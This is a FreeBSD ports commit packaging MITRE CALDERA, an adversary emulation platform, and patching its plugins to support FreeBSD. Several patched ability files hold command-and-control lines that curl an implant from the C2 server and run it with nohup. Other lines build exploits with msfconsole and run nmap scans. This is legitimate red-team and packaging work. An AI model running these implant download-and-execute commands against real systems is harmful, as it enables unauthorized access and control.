diff options
author | Jose Alonso Cardenas Marquez <acm@FreeBSD.org> | 2023-04-29 06:08:03 +0000 |
---|---|---|
committer | Jose Alonso Cardenas Marquez <acm@FreeBSD.org> | 2023-04-29 06:08:03 +0000 |
commit | 84e20fa24498f24ec36a846f4bb69cad07224937 (patch) | |
tree | 3d54a28c2f1328ff0c81ae14a5babd1c5e13e944 | |
parent | 5493ec9d4041b74ea9761c0972e3bfa5eb4abf77 (diff) | |
download | ports-84e20fa24498f24ec36a846f4bb69cad07224937.tar.gz ports-84e20fa24498f24ec36a846f4bb69cad07224937.zip |
security/caldera: New port: Automated Adversary Emulation Platform
CALDERA a cyber security platform designed to easily automate adversary
emulation, assist manual red-teams, and automate incident response.
It is built on the MITRE ATT&CK framework and is an active research project
at MITRE.
The framework consists of two components:
- The core system. This is the framework code, consisting of what is available
in this repository. Included is an asynchronous command-and-control (C2)
server with a REST API and a web interface.
- Plugins. These repositories expand the core framework capabilities and
providing additional functionality. Examples include agents, reporting,
collections of TTPs and more.
113 files changed, 3101 insertions, 0 deletions
diff --git a/security/Makefile b/security/Makefile index 624766505d37..2c7b9d8c6644 100644 --- a/security/Makefile +++ b/security/Makefile @@ -62,6 +62,7 @@ SUBDIR += bzrtp SUBDIR += ca_root_nss SUBDIR += caesarcipher + SUBDIR += caldera SUBDIR += calife SUBDIR += cardpeek SUBDIR += cargo-audit diff --git a/security/caldera/Makefile b/security/caldera/Makefile new file mode 100644 index 000000000000..8648038da272 --- /dev/null +++ b/security/caldera/Makefile @@ -0,0 +1,95 @@ +PORTNAME= caldera +DISTVERSION= 4.1.0 +CATEGORIES= security python + +MAINTAINER= acm@FreeBSD.org +COMMENT= Automated Adversary Emulation Platform +WWW= https://github.com/mitre/caldera + +LICENSE= APACHE20 +LICENSE_FILE= ${WRKSRC}/LICENSE + +RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}cryptography>0:security/py-cryptography@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \ + upx>0:archivers/upx \ + git>0:devel/git \ + bash>0:shells/bash + +USE_GITHUB= yes +GH_ACCOUNT= mitre +GH_PROJECT= ${PORTNAME} +GH_TUPLE= mitre:access:fff4c20:access/plugins/access \ + mitre:atomic:9e2c958:atomic/plugins/atomic \ + mitre:builder:1aca019:builder/plugins/builder \ + mitre:compass:fb88e02:compass/plugins/compass \ + mitre:debrief:d815b60:debrief/plugins/debrief \ + mitre:emu:5dbff82:emu/plugins/emu \ + mitre:fieldmanual:510d0b9:fieldmanual/plugins/fieldmanual \ + mitre:gameboard:3d98c32:gameboard/plugins/gameboard \ + mitre:human:4368dea:human/plugins/human \ + mitre:manx:e7205ea:manx/plugins/manx \ + mitre:mock:4ea3337:mock/plugins/mock \ + mitre:response:889213a:response/plugins/response \ + mitre:sandcat:de3405f:sandcat/plugins/sandcat \ + mitre:ssl:ac5bfcb:ssl/plugins/ssl \ + mitre:stockpile:9662f27:stockpile/plugins/stockpile \ + mitre:training:e309b0f:training/plugins/training + +USES= go:run python:3.8+ + +NO_ARCH= yes +NO_BUILD= yes + +USE_RC_SUBR= ${PORTNAME:S/-/_/} +SUB_FILES= pkg-message +SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \ + WWWDIR=${WWWDIR} + +OPTIONS_DEFINE= HAPROXY +OPTIONS_DEFAULT=HAPROXY +HAPROXY_DESC= Support for HTTPS +HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18 + +post-extract: + ${RM} -R ${WRKSRC}/.github + cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \ + .git* .pre* .stylelintrc.json Dockerfile + +post-patch: + cd ${WRKSRC} && \ + ${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \; + +do-install: + @cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR} + +.include <bsd.port.mk> diff --git a/security/caldera/distinfo b/security/caldera/distinfo new file mode 100644 index 000000000000..d9ca85b369cf --- /dev/null +++ b/security/caldera/distinfo @@ -0,0 +1,35 @@ +TIMESTAMP = 1681965363 +SHA256 (mitre-caldera-4.1.0_GH0.tar.gz) = 342516c29926dbd7e96bc2ba1558779d5ee423eac97a4c48d0245d7480a790eb +SIZE (mitre-caldera-4.1.0_GH0.tar.gz) = 3462547 +SHA256 (mitre-access-fff4c20_GH0.tar.gz) = 087dd5de918c5a2a5a73888abb3839e6d43335ac5f26ee739038813631a24358 +SIZE (mitre-access-fff4c20_GH0.tar.gz) = 8485 +SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085 +SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142 +SHA256 (mitre-builder-1aca019_GH0.tar.gz) = 563c54beed985b11edb96c7ec3a8349f8328a6534750801fa71693ed1cf34346 +SIZE (mitre-builder-1aca019_GH0.tar.gz) = 7946 +SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16 +SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907 +SHA256 (mitre-debrief-d815b60_GH0.tar.gz) = 565e234e52157b6259752c474c40eaa96f15921595f299cbd7875f4bc51e73aa +SIZE (mitre-debrief-d815b60_GH0.tar.gz) = 4419572 +SHA256 (mitre-emu-5dbff82_GH0.tar.gz) = 45b980caf2b9a59d1d9f4bba69334e1b74f036ae667bc510dfc1422ef58829d9 +SIZE (mitre-emu-5dbff82_GH0.tar.gz) = 16962 +SHA256 (mitre-fieldmanual-510d0b9_GH0.tar.gz) = d908a6f0eb4bf8295bc6c92e23aae5984bcd2006069af9ed880978b76c7c0984 +SIZE (mitre-fieldmanual-510d0b9_GH0.tar.gz) = 7811262 +SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a +SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753 +SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a +SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846 +SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470 +SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820 +SHA256 (mitre-mock-4ea3337_GH0.tar.gz) = 36447c30cdff3869796948bff8940b24e710f242e70255578095a10df4d0c5db +SIZE (mitre-mock-4ea3337_GH0.tar.gz) = 5470 +SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee +SIZE (mitre-response-889213a_GH0.tar.gz) = 24463 +SHA256 (mitre-sandcat-de3405f_GH0.tar.gz) = dbb111552220d6f108f852f3d442dcc90d3457c488fbec3f176a4638a611cd56 +SIZE (mitre-sandcat-de3405f_GH0.tar.gz) = 7564017 +SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12 +SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395 +SHA256 (mitre-stockpile-9662f27_GH0.tar.gz) = ab74994666c6759261346bb0c7a653dde5982273d04afd18eb26e7d57c78210c +SIZE (mitre-stockpile-9662f27_GH0.tar.gz) = 4777470 +SHA256 (mitre-training-e309b0f_GH0.tar.gz) = 505d4d4447c9d35e2062064abe1d689f7bc92c818ccb450848e6e57619c24375 +SIZE (mitre-training-e309b0f_GH0.tar.gz) = 492099 diff --git a/security/caldera/files/caldera.in b/security/caldera/files/caldera.in new file mode 100644 index 000000000000..aaedbb017d79 --- /dev/null +++ b/security/caldera/files/caldera.in @@ -0,0 +1,84 @@ +#!/bin/sh + +# PROVIDE: caldera +# REQUIRE: NETWORKING +# KEYWORD: shutdown +# +# Configuration settings for caldera in /etc/rc.conf: +# +# caldera_enable: run caldera as service (default=NO) +# caldera_flags: additional flags for caldera server +# + +. /etc/rc.subr + +name=caldera +rcvar=caldera_enable + +load_rc_config ${name} + +export PATH="${PATH}:/usr/local/bin:/usr/local/sbin" + +: ${caldera_enable:=NO} +: ${caldera_flags="--insecure"} + +caldera_user="www" + +pidfile="/var/run/${name}.pid" + +caldera_wwwdir="%%WWWDIR%%" +python_command="%%PYTHON_CMD%%" +python_script="${caldera_wwwdir}/server.py" +start_cmd=${name}_start +status_cmd=${name}_status +stop_cmd=${name}_stop +restart_cmd=${name}_restart +extra_commands="status" + +caldera_start() +{ + if [ ! -f ${pidfile} ] + then + cd ${caldera_wwwdir} && \ + daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o /var/log/caldera.log \ + ${python_command} ${python_script} \ + ${caldera_flags} + + echo "Starting ${name}" + else + echo "${name} is running as pid" `cat ${pidfile}` + fi +} + +caldera_status() +{ + # If running, show pid + if [ -f ${pidfile} ] + then + echo "${name} is running as pid" `cat ${pidfile}` + else + echo "${name} is not running" + fi +} + +caldera_stop() +{ + if [ -f ${pidfile} ] + then + kill `cat ${pidfile}` + rm ${pidfile} + echo "Stopping ${name}" + else + echo "${name} not running? (check ${pidfile})." + fi +} + +caldera_restart() +{ + echo "Performing restart ${name}" + caldera_stop + sleep 3 + caldera_start +} + +run_rc_command "$1" diff --git a/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml new file mode 100644 index 000000000000..c0bc8a3c91ed --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +@@ -7,7 +7,7 @@ + name: Build or acquire exploits + attack_id: T1349 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red} diff --git a/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml new file mode 100644 index 000000000000..f7304f2ee2ad --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +@@ -7,7 +7,7 @@ + name: Conduct active scanning + attack_id: T1254 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + ./scanner.sh #{target.ip} diff --git a/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh new file mode 100644 index 000000000000..acdadfff6d43 --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh @@ -0,0 +1,11 @@ +--- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/payloads/scanner.sh +@@ -1,5 +1,5 @@ +-#!/bin/bash ++#!/bin/sh + + echo '[+] Starting basic NMAP scan' + nmap -Pn $1 +-echo '[+] Complete with module' +\ No newline at end of file ++echo '[+] Complete with module' diff --git a/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py new file mode 100644 index 000000000000..abc3e67c6ccf --- /dev/null +++ b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py @@ -0,0 +1,11 @@ +--- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC ++++ plugins/atomic/app/atomic_svc.py +@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld + from app.utility.base_service import BaseService + from app.objects.c_agent import Agent + +-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux') ++PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd') + EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh') + RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL) + PREFIX_HASH_LEN = 6 diff --git a/security/caldera/files/patch-plugins_emu_app_emu__svc.py b/security/caldera/files/patch-plugins_emu_app_emu__svc.py new file mode 100644 index 000000000000..38eb16d85180 --- /dev/null +++ b/security/caldera/files/patch-plugins_emu_app_emu__svc.py @@ -0,0 +1,11 @@ +--- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC ++++ plugins/emu/app/emu_svc.py +@@ -12,7 +12,7 @@ from app.utility.base_service import BaseService + + + class EmuService(BaseService): +- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'} ++ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'} + + def __init__(self): + self.log = self.add_service('emu_svc', self) diff --git a/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py new file mode 100644 index 000000000000..7121866698a1 --- /dev/null +++ b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py @@ -0,0 +1,11 @@ +--- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC ++++ plugins/gameboard/app/gameboard_api.py +@@ -244,7 +244,7 @@ class GameboardApi(BaseService): + reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace + ability_id = str(uuid.uuid4()) + executors = [] +- for pl in ['windows', 'darwin', 'linux']: ++ for pl in ['windows', 'darwin', 'linux', 'freebsd']: + reference_executor = reference_ability.find_executor('elasticsearch', pl) + if not reference_executor: + continue diff --git a/security/caldera/files/patch-plugins_human_templates_human.html b/security/caldera/files/patch-plugins_human_templates_human.html new file mode 100644 index 000000000000..9bc604e58123 --- /dev/null +++ b/security/caldera/files/patch-plugins_human_templates_human.html @@ -0,0 +1,40 @@ +--- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC ++++ plugins/human/templates/human.html +@@ -60,6 +60,7 @@ + <select id="base-platform"> + <option disabled="disabled" selected="">Select target OS</option> + <option value="darwin">MacOS</option> ++ <option value="freebsd">FreeBSD</option> + <option value="linux">Linux</option> + <option value="windows-psh">Windows (PowerShell)</option> + </select> +@@ -257,6 +258,11 @@ + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + + '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; + break; ++ case "freebsd": ++ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + ++ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + ++ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; ++ break; + case "linux": + baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + +@@ -293,6 +299,10 @@ + $.each(extra, function(i, command) { + switch (platform) { + case "darwin": ++ command = command.replace(/\\/g, '\\\\'); ++ command = command.replace(/"/g, '\\\"'); ++ break; ++ case "freebsd": + command = command.replace(/\\/g, '\\\\'); + command = command.replace(/"/g, '\\\"'); + break; +@@ -317,4 +327,4 @@ + return provided_value || default_value; + } + +-</script> +\ No newline at end of file ++</script> diff --git a/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml new file mode 100644 index 000000000000..a641bf2abe45 --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml @@ -0,0 +1,33 @@ +--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml +@@ -57,6 +57,30 @@ + contact="tcp"; + agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; + nohup ./$agent -http $server -socket $socket -contact $contact & ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v ++ variations: ++ - description: Run against the UDP contact ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.udp}"; ++ contact="udp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & ++ - description: Download with a random name and start as a background process ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & + windows: + psh: + command: | diff --git a/security/caldera/files/patch-plugins_manx_update-shells.sh b/security/caldera/files/patch-plugins_manx_update-shells.sh new file mode 100644 index 000000000000..97280531ab7d --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_update-shells.sh @@ -0,0 +1,12 @@ +--- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/update-shells.sh +@@ -1,7 +1,8 @@ +-#!/bin/bash ++#!/bin/sh + cwd=$(pwd) + cd shells + GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go + GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go + GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go ++GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go + cd $cwd diff --git a/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml new file mode 100644 index 000000000000..4df13e956c00 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml @@ -0,0 +1,15 @@ +--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml +@@ -24,3 +24,12 @@ + python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 + cleanup: | + pkill -f elasticat ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py; ++ pip install requests; ++ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 ++ cleanup: | ++ pkill -f elasticat diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml new file mode 100644 index 000000000000..e34453b7e11c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +@@ -9,7 +9,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml new file mode 100644 index 000000000000..2962be97e40c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml +@@ -17,7 +17,7 @@ + - source: remote.port.unauthorized + edge: has_pid + target: host.pid.unauthorized +- linux: ++ freebsd,linux: + sh: + command: | + ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}' +@@ -34,4 +34,4 @@ + plugins.response.app.parsers.process: + - source: remote.port.unauthorized + edge: has_pid +- target: host.pid.unauthorized +\ No newline at end of file ++ target: host.pid.unauthorized diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml new file mode 100644 index 000000000000..5c45a62b261e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + filepath="#{file.sensitive.path}"; +@@ -46,4 +46,4 @@ + edge: has_hash + target: file.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: file.sensitive.hash +\ No newline at end of file ++ - source: file.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml new file mode 100644 index 000000000000..bb5c268f119d --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + directory="#{directory.sensitive.path}"; +@@ -68,4 +68,4 @@ + edge: has_hash + target: directory.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: directory.sensitive.hash +\ No newline at end of file ++ - source: directory.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml new file mode 100644 index 000000000000..04e09ebbabbd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +@@ -8,7 +8,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + set -f; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml new file mode 100644 index 000000000000..9c0b12919fb9 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml @@ -0,0 +1,11 @@ +--- 